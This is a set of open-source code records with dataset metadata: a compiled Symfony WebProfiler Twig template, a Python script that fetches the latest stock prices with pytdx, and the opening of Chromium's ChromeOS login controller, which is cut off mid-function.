<h3>Session Metadata</h3>
";
// line 156
if (twig_test_empty($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "sessionmetadata", array()))) {
// line 157
echo " <div class=\"empty\">
<p>No session metadata</p>
</div>
";
} else {
// line 161
echo " ";
echo twig_include($this->env, $context, "@WebProfiler/Profiler/table.html.twig", array("data" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "sessionmetadata", array())), false);
echo "
";
}
// line 163
echo "
<h3>Session Attributes</h3>
";
// line 166
if (twig_test_empty($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "sessionattributes", array()))) {
// line 167
echo " <div class=\"empty\">
<p>No session attributes</p>
</div>
";
} else {
// line 171
echo " ";
echo twig_include($this->env, $context, "@WebProfiler/Profiler/table.html.twig", array("data" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "sessionattributes", array()), "labels" => array(0 => "Attribute", 1 => "Value")), false);
echo "
";
}
// line 173
echo " </div>
</div>
<div class=\"tab ";
// line 176
echo ((twig_test_empty($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "flashes", array()))) ? ("disabled") : (""));
echo "\">
<h3 class=\"tab-title\">Flashes</h3>
<div class=\"tab-content\">
<h3>Flashes</h3>
";
// line 182
if (twig_test_empty($this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "flashes", array()))) {
// line 183
echo " <div class=\"empty\">
<p>No flash messages were created.</p>
</div>
";
} else {
// line 187
echo " ";
echo twig_include($this->env, $context, "@WebProfiler/Profiler/table.html.twig", array("data" => $this->getAttribute((isset($context["collector"]) ? $context["collector"] : $this->getContext($context, "collector")), "flashes", array())), false);
echo "
";
}
// line 189
echo " </div>
</div>
";
// line 192
if ($this->getAttribute((isset($context["profile"]) ? $context["profile"] : $this->getContext($context, "profile")), "parent", array())) {
// line 193
echo " <div class=\"tab\">
<h3 class=\"tab-title\">Parent Request</h3>
<div class=\"tab-content\">
<h3>
<a href=\"";
// line 198
echo twig_escape_filter($this->env, $this->env->getExtension('routing')->getPath("_profiler", array("token" => $this->getAttribute($this->getAttribute((isset($context["profile"]) ? $context["profile"] : $this->getContext($context, "profile")), "parent", array()), "token", array()))), "html", null, true);
echo "\">Return to parent request</a>
<small>(token = ";
// line 199
echo twig_escape_filter($this->env, $this->getAttribute($this->getAttribute((isset($context["profile"]) ? $context["profile"] : $this->getContext($context, "profile")), "parent", array()), "token", array()), "html", null, true);
echo ")</small>
</h3>
";
// line 202
echo twig_include($this->env, $context, "@WebProfiler/Profiler/bag.html.twig", array("bag" => $this->getAttribute($this->getAttribute($this->getAttribute((isset($context["profile"]) ? $context["profile"] : $this->getContext($context, "profile")), "parent", array()), "getcollector", array(0 => "request"), "method"), "requestattributes", array())), false);
echo "
</div>
</div>
";
}
// line 206
echo "
";
// line 207
if (twig_length_filter($this->env, $this->getAttribute((isset($context["profile"]) ? $context["profile"] : $this->getContext($context, "profile")), "children", array()))) {
// line 208
echo " <div class=\"tab\">
<h3 class=\"tab-title\">Sub Requests <span class=\"badge\">";
// line 209
echo twig_escape_filter($this->env, twig_length_filter($this->env, $this->getAttribute((isset($context["profile"]) ? $context["profile"] : $this->getContext($context, "profile")), "children", array())), "html", null, true);
echo "</span></h3>
<div class=\"tab-content\">
";
// line 212
$context['_parent'] = $context;
$context['_seq'] = twig_ensure_traversable($this->getAttribute((isset($context["profile"]) ? $context["profile"] : $this->getContext($context, "profile")), "children", array()));
foreach ($context['_seq'] as $context["_key"] => $context["child"]) {
// line 213
echo " <h3>
<a href=\"";
// line 214
echo twig_escape_filter($this->env, $this->env->getExtension('routing')->getPath("_profiler", array("token" => $this->getAttribute($context["child"], "token", array()))), "html", null, true);
echo "\">";
// line 215
echo twig_escape_filter($this->env, $this->getAttribute($this->getAttribute($this->getAttribute($context["child"], "getcollector", array(0 => "request"), "method"), "requestattributes", array()), "get", array(0 => "_controller"), "method"), "html", null, true);
// line 216
echo "</a>
<small>(token = ";
// line 217
echo twig_escape_filter($this->env, $this->getAttribute($context["child"], "token", array()), "html", null, true);
echo ")</small>
</h3>
";
// line 220
echo twig_include($this->env, $context, "@WebProfiler/Profiler/bag.html.twig", array("bag" => $this->getAttribute($this->getAttribute($context["child"], "getcollector", array(0 => "request"), "method"), "requestattributes", array())), false);
echo "
";
}
$_parent = $context['_parent'];
unset($context['_seq'], $context['_iterated'], $context['_key'], $context['child'], $context['_parent'], $context['loop']);
$context = array_intersect_key($context, $_parent) + $_parent;
// line 222
echo " </div>
</div>
";
}
// line 225
echo " </div>
";
$__internal_623d89ee401d94928375fd08ad0031816f48dfd5b8676b9f48dbe4e6b972aeb5->leave($__internal_623d89ee401d94928375fd08ad0031816f48dfd5b8676b9f48dbe4e6b972aeb5_prof);
}
public function getTemplateName()
{
return "@WebProfiler/Collector/request.html.twig";
}
public function isTraitable()
{
return false;
}
public function getDebugInfo()
{
return array ( 507 => 225, 502 => 222, 494 => 220, 488 => 217, 485 => 216, 483 => 215, 480 => 214, 477 => 213, 473 => 212, 467 => 209, 464 => 208, 462 => 207, 459 => 206, 452 => 202, 446 => 199, 442 => 198, 435 => 193, 433 => 192, 428 => 189, 422 => 187, 416 => 183, 414 => 182, 405 => 176, 400 => 173, 394 => 171, 388 => 167, 386 => 166, 381 => 163, 375 => 161, 369 => 157, 367 => 156, 358 => 150, 351 => 146, 338 => 136, 334 => 134, 328 => 130, 322 => 127, 319 => 126, 317 => 125, 312 => 122, 310 => 121, 303 => 117, 299 => 115, 293 => 113, 287 => 109, 285 => 108, 280 => 105, 274 => 103, 268 => 99, 266 => 98, 261 => 95, 255 => 93, 249 => 89, 247 => 88, 242 => 85, 236 => 83, 230 => 79, 228 => 78, 219 => 71, 213 => 70, 202 => 65, 199 => 64, 193 => 63, 184 => 60, 181 => 59, 171 => 56, 163 => 51, 158 => 48, 152 => 45, 148 => 43, 146 => 42, 140 => 39, 130 => 34, 126 => 32, 124 => 31, 121 => 30, 118 => 29, 113 => 27, 110 => 26, 108 => 25, 101 => 24, 99 => 23, 96 => 22, 94 => 21, 91 => 20, 88 => 19, 82 => 17, 79 => 16, 73 => 15, 69 => 12, 67 => 11, 65 => 9, 62 => 8, 51 => 7, 48 => 6, 45 => 5, 42 => 4, 36 => 3, 11 => 1,);
}
}
/* {% extends '@WebProfiler/Profiler/layout.html.twig' %}*/
/* */
/* {% block toolbar %}*/
/* {% set request_handler %}*/
/* {% if collector.controller.class is defined %}*/
/* {% set link = collector.controller.file|file_link(collector.controller.line) %}*/
/* {% if link %}<a href="{{ link }}" title="{{ collector.controller.file }}">{% else %}<span>{% endif %}*/
/* */
/* {{ collector.controller.class|abbr_class|striptags }}*/
/* */
/* {%- if collector.controller.method -%}*/
/* :: {{ collector.controller.method }}*/
/* {%- endif -%}*/
/* */
/* {% if link %}</a>{% else %}</span>{% endif %}*/
/* {% else %}*/
/* <span>{{ collector.controller }}</span>*/
/* {% endif %}*/
/* {% endset %}*/
/* */
/* {% set request_status_code_color = (collector.statuscode >= 400) ? 'red' : (collector.statuscode >= 300) ? 'yellow' : 'green' %}*/
/* */
/* {% set icon %}*/
/* <span class="sf-toolbar-status sf-toolbar-status-{{ request_status_code_color }}">{{ collector.statuscode }}</span>*/
/* {% if collector.route %}*/
/* <span class="sf-toolbar-label">@</span>*/
/* <span class="sf-toolbar-value sf-toolbar-info-piece-additional">{{ collector.route }}</span>*/
/* {% endif %}*/
/* {% endset %}*/
/* */
/* {% set text %}*/
/* <div class="sf-toolbar-info-piece">*/
/* <b>HTTP status</b>*/
/* <span>{{ collector.statuscode }} {{ collector.statustext }}</span>*/
/* </div>*/
/* */
/* <div class="sf-toolbar-info-piece">*/
/* <b>Controller</b>*/
/* <span>{{ request_handler }}</span>*/
/* </div>*/
/* */
/* {% if collector.controller.class is defined %}*/
/* <div class="sf-toolbar-info-piece">*/
/* <b>Controller class</b>*/
/* <span>{{ collector.controller.class }}</span>*/
/* </div>*/
/* {% endif %}*/
/* */
/* <div class="sf-toolbar-info-piece">*/
/* <b>Route name</b>*/
/* <span>{{ collector.route|default('NONE') }}</span>*/
/* </div>*/
/* */
/* <div class="sf-toolbar-info-piece">*/
/* <b>Has session</b>*/
/* <span>{% if collector.sessionmetadata|length %}yes{% else %}no{% endif %}</span>*/
/* </div>*/
/* {% endset %}*/
/* */
/* {{ include('@WebProfiler/Profiler/toolbar_item.html.twig', { link: profiler_url }) }}*/
/* {% endblock %}*/
/* */
/* {% block menu %}*/
/* <span class="label">*/
/* <span class="icon">{{ include('@WebProfiler/Icon/request.svg') }}</span>*/
/* <strong>Request / Response</strong>*/
/* </span>*/
/* {% endblock %}*/
/* */
/* {% block panel %}*/
/* <div class="sf-tabs">*/
/* <div class="tab">*/
/* <h3 class="tab-title">Request</h3>*/
/* */
/* <div class="tab-content">*/
/* <h3>GET Parameters</h3>*/
/* */
/* {% if collector.requestquery.all is empty %}*/
/* <div class="empty">*/
/* <p>No GET parameters</p>*/
/* </div>*/
/* {% else %}*/
/* {{ include('@WebProfiler/Profiler/bag.html.twig', { bag: collector.requestquery }, with_context = false) }}*/
/* {% endif %}*/
/* */
/* <h3>POST Parameters</h3>*/
/* */
/* {% if collector.requestrequest.all is empty %}*/
/* <div class="empty">*/
/* <p>No POST parameters</p>*/
/* </div>*/
/* {% else %}*/
/* {{ include('@WebProfiler/Profiler/bag.html.twig', { bag: collector.requestrequest }, with_context = false) }}*/
/* {% endif %}*/
/* */
/* <h3>Request Attributes</h3>*/
/* */
/* {% if collector.requestattributes.all is empty %}*/
/* <div class="empty">*/
/* <p>No attributes</p>*/
/* </div>*/
/* {% else %}*/
/* {{ include('@WebProfiler/Profiler/bag.html.twig', { bag: collector.requestattributes }, with_context = false) }}*/
/* {% endif %}*/
/* */
/* <h3>Cookies</h3>*/
/* */
/* {% if collector.requestcookies.all is empty %}*/
/* <div class="empty">*/
/* <p>No cookies</p>*/
/* </div>*/
/* {% else %}*/
/* {{ include('@WebProfiler/Profiler/bag.html.twig', { bag: collector.requestcookies }, with_context = false) }}*/
/* {% endif %}*/
/* */
/* <h3>Request Headers</h3>*/
/* {{ include('@WebProfiler/Profiler/bag.html.twig', { bag: collector.requestheaders, labels: ['Header', 'Value'] }, with_context = false) }}*/
/* */
/* <h3>Request Content</h3>*/
/* */
/* {% if collector.content == false %}*/
/* <div class="empty">*/
/* <p>Request content not available (it was retrieved as a resource).</p>*/
/* </div>*/
/* {% elseif collector.content %}*/
/* <div class="card">*/
/* <pre class="break-long-words">{{ collector.content }}</pre>*/
/* </div>*/
/* {% else %}*/
/* <div class="empty">*/
/* <p>No content</p>*/
/* </div>*/
/* {% endif %}*/
/* */
/* <h3>Server Parameters</h3>*/
/* {{ include('@WebProfiler/Profiler/bag.html.twig', { bag: collector.requestserver }, with_context = false) }}*/
/* </div>*/
/* </div>*/
/* */
/* <div class="tab">*/
/* <h3 class="tab-title">Response</h3>*/
/* */
/* <div class="tab-content">*/
/* <h3>Response Headers</h3>*/
/* */
/* {{ include('@WebProfiler/Profiler/bag.html.twig', { bag: collector.responseheaders, labels: ['Header', 'Value'] }, with_context = false) }}*/
/* </div>*/
/* </div>*/
/* */
/* <div class="tab {{ collector.sessionmetadata is empty ? 'disabled' }}">*/
/* <h3 class="tab-title">Session</h3>*/
/* */
/* <div class="tab-content">*/
/* <h3>Session Metadata</h3>*/
/* */
/* {% if collector.sessionmetadata is empty %}*/
/* <div class="empty">*/
/* <p>No session metadata</p>*/
/* </div>*/
/* {% else %}*/
/* {{ include('@WebProfiler/Profiler/table.html.twig', { data: collector.sessionmetadata }, with_context = false) }}*/
/* {% endif %}*/
/* */
/* <h3>Session Attributes</h3>*/
/* */
/* {% if collector.sessionattributes is empty %}*/
/* <div class="empty">*/
/* <p>No session attributes</p>*/
/* </div>*/
/* {% else %}*/
/* {{ include('@WebProfiler/Profiler/table.html.twig', { data: collector.sessionattributes, labels: ['Attribute', 'Value'] }, with_context = false) }}*/
/* {% endif %}*/
/* </div>*/
/* </div>*/
/* */
/* <div class="tab {{ collector.flashes is empty ? 'disabled' }}">*/
/* <h3 class="tab-title">Flashes</h3>*/
/* */
/* <div class="tab-content">*/
/* <h3>Flashes</h3>*/
/* */
/* {% if collector.flashes is empty %}*/
/* <div class="empty">*/
/* <p>No flash messages were created.</p>*/
/* </div>*/
/* {% else %}*/
/* {{ include('@WebProfiler/Profiler/table.html.twig', { data: collector.flashes }, with_context = false) }}*/
/* {% endif %}*/
/* </div>*/
/* </div>*/
/* */
/* {% if profile.parent %}*/
/* <div class="tab">*/
/* <h3 class="tab-title">Parent Request</h3>*/
/* */
/* <div class="tab-content">*/
/* <h3>*/
/* <a href="{{ path('_profiler', { token: profile.parent.token }) }}">Return to parent request</a>*/
/* <small>(token = {{ profile.parent.token }})</small>*/
/* </h3>*/
/* */
/* {{ include('@WebProfiler/Profiler/bag.html.twig', { bag: profile.parent.getcollector('request').requestattributes }, with_context = false) }}*/
/* </div>*/
/* </div>*/
/* {% endif %}*/
/* */
/* {% if profile.children|length %}*/
/* <div class="tab">*/
/* <h3 class="tab-title">Sub Requests <span class="badge">{{ profile.children|length }}</span></h3>*/
/* */
/* <div class="tab-content">*/
/* {% for child in profile.children %}*/
/* <h3>*/
/* <a href="{{ path('_profiler', { token: child.token }) }}">*/
/* {{- child.getcollector('request').requestattributes.get('_controller') -}}*/
/* </a>*/
/* <small>(token = {{ child.token }})</small>*/
/* </h3>*/
/* */
/* {{ include('@WebProfiler/Profiler/bag.html.twig', { bag: child.getcollector('request').requestattributes }, with_context = false) }}*/
/* {% endfor %}*/
/* </div>*/
/* </div>*/
/* {% endif %}*/
/* </div>*/
/* {% endblock %}*/
/* */
|
PHP
|
MIT
|
jed38630/marketplace/var/cache/dev/twig/e3/e35fa14b85c892a2b28242bd8c7c5f7c991bc262803cfb13465ddaf168dc32ed.php
|
be5a0b68-02c2-4b6b-8a43-9a080c0b7fa9
|
[]
|
[]
|
# coding: utf-8
from pytdx.hq import TdxHq_API
from pytdx.params import TDXParams
import pandas as pd
import numpy as np
import re
import csv
import io
import time
import traceback
if __name__ == '__main__':
with io.open(r'..\all_other_data\symbol.txt', 'r', encoding='utf-8') as f:
symbol = [s.strip() for s in f.readlines()]
TDXHQ = TdxHq_API(raise_exception=True, auto_retry=True)
if not TDXHQ.connect('121.14.110.200', 443):
raise Exception("Can't connect.")
#symbol = symbol[0:5]
first_df = True
for code in symbol:
if code[0:2] == 'SH':
market = 1
else:
market = 0
code = code [2:]
#quote_info = TDXHQ.get_security_quotes([(market, code)])
quote_info = TDXHQ.get_security_bars(9, market, code, 0, 1)
try:
if first_df:
columns = ['code', 'price']
quote_df = pd.DataFrame(columns=columns)
first_df = False
values = [code, quote_info[0]['close']]
quote_df.loc[quote_df.shape[0]] = values
except Exception as e:
print "code {}, process bars error, skipped.".format(code)
print e.message
print quote_info
quote_df = quote_df.rename(columns={
'code':'代码',
'price':'价格',
})
# string_columns = ['代码']
# quote_df[string_columns] = quote_df[string_columns].applymap(
# lambda x: '=""' if type(x) is float else '="' + str(x) + '"')
quote_df.to_csv(r"..\all_other_data\all_last_price.csv", encoding="gbk", quoting=csv.QUOTE_NONE, index=False)
TDXHQ.disconnect()
|
Python
|
MIT
|
lte2000/cwfx/get_data/get_last_price.py
|
5d51c5f8-c845-4e94-a855-c776ba1b4fac
|
[{"tag": "IP_ADDRESS", "value": "121.14.110.200", "start": 430, "end": 444, "context": "=True, auto_retry=True)\n if not TDXHQ.connect('121.14.110.200', 443):\n raise Exception(\"Can't connect.\")"}]
|
[{"tag": "IP_ADDRESS", "value": "121.14.110.200", "start": 430, "end": 444, "context": "=True, auto_retry=True)\n if not TDXHQ.connect('121.14.110.200', 443):\n raise Exception(\"Can't connect.\")"}]
|
// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "chrome/browser/chromeos/login/existing_user_controller.h"
#include <vector>
#include "base/bind.h"
#include "base/bind_helpers.h"
#include "base/callback.h"
#include "base/command_line.h"
#include "base/logging.h"
#include "base/memory/scoped_ptr.h"
#include "base/message_loop.h"
#include "base/metrics/histogram.h"
#include "base/prefs/pref_service.h"
#include "base/strings/string_util.h"
#include "base/strings/stringprintf.h"
#include "base/strings/utf_string_conversions.h"
#include "base/values.h"
#include "base/version.h"
#include "chrome/browser/browser_process.h"
#include "chrome/browser/chromeos/accessibility/accessibility_manager.h"
#include "chrome/browser/chromeos/boot_times_loader.h"
#include "chrome/browser/chromeos/cros/cros_library.h"
#include "chrome/browser/chromeos/customization_document.h"
#include "chrome/browser/chromeos/kiosk_mode/kiosk_mode_settings.h"
#include "chrome/browser/chromeos/login/helper.h"
#include "chrome/browser/chromeos/login/login_display_host.h"
#include "chrome/browser/chromeos/login/login_utils.h"
#include "chrome/browser/chromeos/login/startup_utils.h"
#include "chrome/browser/chromeos/login/user_manager.h"
#include "chrome/browser/chromeos/login/wizard_controller.h"
#include "chrome/browser/chromeos/net/connectivity_state_helper.h"
#include "chrome/browser/chromeos/policy/device_local_account.h"
#include "chrome/browser/chromeos/profiles/profile_helper.h"
#include "chrome/browser/chromeos/settings/cros_settings.h"
#include "chrome/browser/chromeos/settings/cros_settings_names.h"
#include "chrome/browser/chromeos/system/statistics_provider.h"
#include "chrome/browser/google/google_util.h"
#include "chrome/browser/policy/policy_service.h"
#include "chrome/browser/prefs/session_startup_pref.h"
#include "chrome/common/chrome_notification_types.h"
#include "chrome/common/chrome_switches.h"
#include "chrome/common/chrome_version_info.h"
#include "chrome/common/pref_names.h"
#include "chrome/common/url_constants.h"
#include "chromeos/chromeos_switches.h"
#include "chromeos/dbus/dbus_thread_manager.h"
#include "chromeos/dbus/power_manager_client.h"
#include "chromeos/dbus/session_manager_client.h"
#include "content/public/browser/browser_thread.h"
#include "content/public/browser/notification_service.h"
#include "content/public/browser/notification_types.h"
#include "content/public/browser/user_metrics.h"
#include "google_apis/gaia/gaia_auth_util.h"
#include "google_apis/gaia/google_service_auth_error.h"
#include "grit/generated_resources.h"
#include "net/http/http_auth_cache.h"
#include "net/http/http_network_session.h"
#include "net/http/http_transaction_factory.h"
#include "net/url_request/url_request_context.h"
#include "net/url_request/url_request_context_getter.h"
#include "ui/base/l10n/l10n_util.h"
#include "ui/views/widget/widget.h"
namespace chromeos {
namespace {
// Major version where we still show GSG as "Release Notes" after the update.
const long int kReleaseNotesTargetRelease = 19;
// URL for account creation.
const char kCreateAccountURL[] =
"https://accounts.google.com/NewAccount?service=mail";
// ChromeVox tutorial URL (used in place of "getting started" url when
// accessibility is enabled).
const char kChromeVoxTutorialURLPattern[] =
"http://www.chromevox.com/tutorial/index.html?lang=%s";
// Delay for transferring the auth cache to the system profile.
const long int kAuthCacheTransferDelayMs = 2000;
// Delay for restarting the ui if safe-mode login has failed.
const long int kSafeModeRestartUiDelayMs = 30000;
// Delay for rebooting machine if TPM critical error was encountered.
const long int kCriticalErrorRebootDelayMs = 3500;
// Makes a call to the policy subsystem to reload the policy when we detect
// authentication change.
void RefreshPoliciesOnUIThread() {
if (g_browser_process->policy_service())
g_browser_process->policy_service()->RefreshPolicies(base::Closure());
}
// Copies any authentication details that were entered in the login profile in
// the mail profile to make sure all subsystems of Chrome can access the network
// with the provided authentication which are possibly for a proxy server.
void TransferContextAuthenticationsOnIOThread(
net::URLRequestContextGetter* default_profile_context_getter,
net::URLRequestContextGetter* browser_process_context_getter) {
net::HttpAuthCache* new_cache =
browser_process_context_getter->GetURLRequestContext()->
http_transaction_factory()->GetSession()->http_auth_cache();
net::HttpAuthCache* old_cache =
default_profile_context_getter->GetURLRequestContext()->
http_transaction_factory()->GetSession()->http_auth_cache();
new_cache->UpdateAllFrom(*old_cache);
VLOG(1) << "Main request context populated with authentication data.";
// Last but not least tell the policy subsystem to refresh now as it might
// have been stuck until now too.
content::BrowserThread::PostTask(content::BrowserThread::UI, FROM_HERE,
base::Bind(&RefreshPoliciesOnUIThread));
}
} // namespace
// static
ExistingUserController* ExistingUserController::current_controller_ = NULL;
////////////////////////////////////////////////////////////////////////////////
// ExistingUserController, public:
ExistingUserController::ExistingUserController(LoginDisplayHost* host)
: login_status_consumer_(NULL),
host_(host),
login_display_(host_->CreateLoginDisplay(this)),
num_login_attempts_(0),
cros_settings_(CrosSettings::Get()),
weak_factory_(this),
offline_failed_(false),
is_login_in_progress_(false),
password_changed_(false),
do_auto_enrollment_(false),
signin_screen_ready_(false) {
DCHECK(current_controller_ == NULL);
current_controller_ = this;
registrar_.Add(this,
chrome::NOTIFICATION_LOGIN_USER_IMAGE_CHANGED,
content::NotificationService::AllSources());
registrar_.Add(this,
chrome::NOTIFICATION_USER_LIST_CHANGED,
content::NotificationService::AllSources());
registrar_.Add(this,
chrome::NOTIFICATION_AUTH_SUPPLIED,
content::NotificationService::AllSources());
registrar_.Add(this,
chrome::NOTIFICATION_SESSION_STARTED,
content::NotificationService::AllSources());
cros_settings_->AddSettingsObserver(kAccountsPrefShowUserNamesOnSignIn, this);
cros_settings_->AddSettingsObserver(kAccountsPrefAllowNewUser, this);
cros_settings_->AddSettingsObserver(kAccountsPrefAllowGuest, this);
cros_settings_->AddSettingsObserver(kAccountsPrefUsers, this);
cros_settings_->AddSettingsObserver(
kAccountsPrefDeviceLocalAccountAutoLoginId,
this);
cros_settings_->AddSettingsObserver(
kAccountsPrefDeviceLocalAccountAutoLoginDelay,
this);
}
void ExistingUserController::Init(const UserList& users) {
time_init_ = base::Time::Now();
UpdateLoginDisplay(users);
ConfigurePublicSessionAutoLogin();
LoginUtils::Get()->PrewarmAuthentication();
DBusThreadManager::Get()->GetSessionManagerClient()->EmitLoginPromptReady();
}
void ExistingUserController::UpdateLoginDisplay(const UserList& users) {
bool show_users_on_signin;
UserList filtered_users;
cros_settings_->GetBoolean(kAccountsPrefShowUserNamesOnSignIn,
&show_users_on_signin);
if (show_users_on_signin) {
for (UserList::const_iterator it = users.begin(); it != users.end(); ++it) {
// TODO(xiyuan): Clean user profile whose email is not in whitelist.
if (LoginUtils::IsWhitelisted((*it)->email()) ||
(*it)->GetType() != User::USER_TYPE_REGULAR) {
filtered_users.push_back(*it);
}
}
}
// If no user pods are visible, fallback to single new user pod which will
// have guest session link.
bool show_guest;
cros_settings_->GetBoolean(kAccountsPrefAllowGuest, &show_guest);
bool show_users;
cros_settings_->GetBoolean(kAccountsPrefShowUserNamesOnSignIn, &show_users);
show_guest &= !filtered_users.empty();
bool show_new_user = true;
login_display_->set_parent_window(GetNativeWindow());
login_display_->Init(filtered_users, show_guest, show_users, show_new_user);
host_->OnPreferencesChanged();
}
void ExistingUserController::DoAutoEnrollment() {
do_auto_enrollment_ = true;
}
void ExistingUserController::ResumeLogin() {
// This means the user signed-in, then auto-enrollment used his credentials
// to enroll and succeeded.
resume_login_callback_.Run();
resume_login_callback_.Reset();
}
void ExistingUserController::PrepareKioskAppLaunch() {
// Disable login UI while waiting for the kiosk app launch. There is no
// balanced UI enable call because this very login screen will not be
// accessed again. If app is launched, it will be destroyed. If app fails to
// launch, chrome is restarted to go back to a new login screen.
login_display_->SetUIEnabled(false);
}
////////////////////////////////////////////////////////////////////////////////
// ExistingUserController, content::NotificationObserver implementation:
//
void ExistingUserController::Observe(
int type,
const content::NotificationSource& source,
const content::NotificationDetails& details) {
if (type == chrome::NOTIFICATION_SESSION_STARTED) {
// Stop listening to any notification once session has started.
// Sign in screen objects are marked for deletion with DeleteSoon so
// make sure no object would be used after session has started.
// http://crbug.com/125276
registrar_.RemoveAll();
return;
}
if (type == chrome::NOTIFICATION_SYSTEM_SETTING_CHANGED) {
const std::string setting = *content::Details<const std::string>(
details).ptr();
if (setting == kAccountsPrefDeviceLocalAccountAutoLoginId ||
setting == kAccountsPrefDeviceLocalAccountAutoLoginDelay) {
ConfigurePublicSessionAutoLogin();
}
}
if (type == chrome::NOTIFICATION_SYSTEM_SETTING_CHANGED ||
type == chrome::NOTIFICATION_USER_LIST_CHANGED) {
if (host_ != NULL) {
// Signed settings or user list changed. Notify views and update them.
UpdateLoginDisplay(chromeos::UserManager::Get()->GetUsers());
ConfigurePublicSessionAutoLogin();
return;
}
}
if (type == chrome::NOTIFICATION_AUTH_SUPPLIED) {
// Possibly the user has authenticated against a proxy server and we might
// need the credentials for enrollment and other system requests from the
// main |g_browser_process| request context (see bug
// http://crosbug.com/24861). So we transfer any credentials to the global
// request context here.
// The issue we have here is that the NOTIFICATION_AUTH_SUPPLIED is sent
// just after the UI is closed but before the new credentials were stored
// in the profile. Therefore we have to give it some time to make sure it
// has been updated before we copy it.
LOG(INFO) << "Authentication was entered manually, possibly for proxyauth.";
scoped_refptr<net::URLRequestContextGetter> browser_process_context_getter =
g_browser_process->system_request_context();
Profile* signin_profile = ProfileHelper::GetSigninProfile();
scoped_refptr<net::URLRequestContextGetter> signin_profile_context_getter =
signin_profile->GetRequestContext();
DCHECK(browser_process_context_getter.get());
DCHECK(signin_profile_context_getter.get());
content::BrowserThread::PostDelayedTask(
content::BrowserThread::IO, FROM_HERE,
base::Bind(&TransferContextAuthenticationsOnIOThread,
signin_profile_context_getter,
browser_process_context_getter),
base::TimeDelta::FromMilliseconds(kAuthCacheTransferDelayMs));
}
if (type != chrome::NOTIFICATION_LOGIN_USER_IMAGE_CHANGED)
return;
login_display_->OnUserImageChanged(*content::Details<User>(details).ptr());
}
////////////////////////////////////////////////////////////////////////////////
// ExistingUserController, private:
ExistingUserController::~ExistingUserController() {
LoginUtils::Get()->DelegateDeleted(this);
cros_settings_->RemoveSettingsObserver(kAccountsPrefShowUserNamesOnSignIn,
this);
cros_settings_->RemoveSettingsObserver(kAccountsPrefAllowNewUser, this);
cros_settings_->RemoveSettingsObserver(kAccountsPrefAllowGuest, this);
cros_settings_->RemoveSettingsObserver(kAccountsPrefUsers, this);
cros_settings_->RemoveSettingsObserver(
kAccountsPrefDeviceLocalAccountAutoLoginId,
this);
cros_settings_->RemoveSettingsObserver(
kAccountsPrefDeviceLocalAccountAutoLoginDelay,
this);
if (current_controller_ == this) {
current_controller_ = NULL;
} else {
NOTREACHED() << "More than one controller are alive.";
}
DCHECK(login_display_.get());
}
////////////////////////////////////////////////////////////////////////////////
// ExistingUserController, LoginDisplay::Delegate implementation:
//
void ExistingUserController::CancelPasswordChangedFlow() {
login_performer_.reset(NULL);
login_display_->SetUIEnabled(true);
StartPublicSessionAutoLoginTimer();
}
void ExistingUserController::CreateAccount() {
content::RecordAction(content::UserMetricsAction("Login.CreateAccount"));
guest_mode_url_ =
google_util::AppendGoogleLocaleParam(GURL(kCreateAccountURL));
LoginAsGuest();
}
void ExistingUserController::CompleteLogin(const UserContext& user_context) {
login_display_->set_signin_completed(true);
if (!host_) {
// Complete login event was generated already from UI. Ignore notification.
return;
}
// Stop the auto-login timer when attempting login.
StopPublicSessionAutoLoginTimer();
// Disable UI while loading user profile.
login_display_->SetUIEnabled(false);
if (!time_init_.is_null()) {
base::TimeDelta delta = base::Time::Now() - time_init_;
UMA_HISTOGRAM_MEDIUM_TIMES("Login.PromptToCompleteLoginTime", delta);
time_init_ = base::Time(); // Reset to null.
}
host_->OnCompleteLogin();
// Do an ownership check now to avoid auto-enrolling if the device has
// already been owned.
DeviceSettingsService::Get()->GetOwnershipStatusAsync(
base::Bind(&ExistingUserController::CompleteLoginInternal,
weak_factory_.GetWeakPtr(),
user_context));
}
void ExistingUserController::CompleteLoginInternal(
const UserContext& user_context,
DeviceSettingsService::OwnershipStatus ownership_status,
bool is_owner) {
// Auto-enrollment must have made a decision by now. It's too late to enroll
// if the protocol isn't done at this point.
if (do_auto_enrollment_ &&
ownership_status == DeviceSettingsService::OWNERSHIP_NONE) {
VLOG(1) << "Forcing auto-enrollment before completing login";
// The only way to get out of the enrollment screen from now on is to either
// complete enrollment, or opt-out of it. So this controller shouldn't force
// enrollment again if it is reused for another sign-in.
do_auto_enrollment_ = false;
auto_enrollment_username_ = user_context.username;
resume_login_callback_ = base::Bind(
&ExistingUserController::PerformLogin,
weak_factory_.GetWeakPtr(),
user_context, LoginPerformer::AUTH_MODE_EXTENSION);
ShowEnrollmentScreen(true, user_context.username);
// Enable UI for the enrollment screen. SetUIEnabled(true) will post a
// request to show the sign-in screen again when invoked at the sign-in
// screen; invoke SetUIEnabled() after navigating to the enrollment screen.
login_display_->SetUIEnabled(true);
} else {
PerformLogin(user_context, LoginPerformer::AUTH_MODE_EXTENSION);
}
}
string16 ExistingUserController::GetConnectedNetworkName() {
return GetCurrentNetworkName();
}
bool ExistingUserController::IsSigninInProgress() const {
return is_login_in_progress_;
}
void ExistingUserController::Login(const UserContext& user_context) {
if ((user_context.username.empty() || user_context.password.empty()) &&
user_context.auth_code.empty())
return;
// Stop the auto-login timer when attempting login.
StopPublicSessionAutoLoginTimer();
// Disable clicking on other windows.
login_display_->SetUIEnabled(false);
BootTimesLoader::Get()->RecordLoginAttempted();
if (last_login_attempt_username_ != user_context.username) {
last_login_attempt_username_ = user_context.username;
num_login_attempts_ = 0;
// Also reset state variables, which are used to determine password change.
offline_failed_ = false;
online_succeeded_for_.clear();
}
num_login_attempts_++;
PerformLogin(user_context, LoginPerformer::AUTH_MODE_INTERNAL);
}
void ExistingUserController::PerformLogin(
const UserContext& user_context,
LoginPerformer::AuthorizationMode auth_mode) {
UserManager::Get()->GetUserFlow(last_login_attempt_username_)->
set_host(host_);
// Disable UI while loading user profile.
login_display_->SetUIEnabled(false);
// Use the same LoginPerformer for subsequent login as it has state
// such as Authenticator instance.
if (!login_performer_.get() || num_login_attempts_ <= 1) {
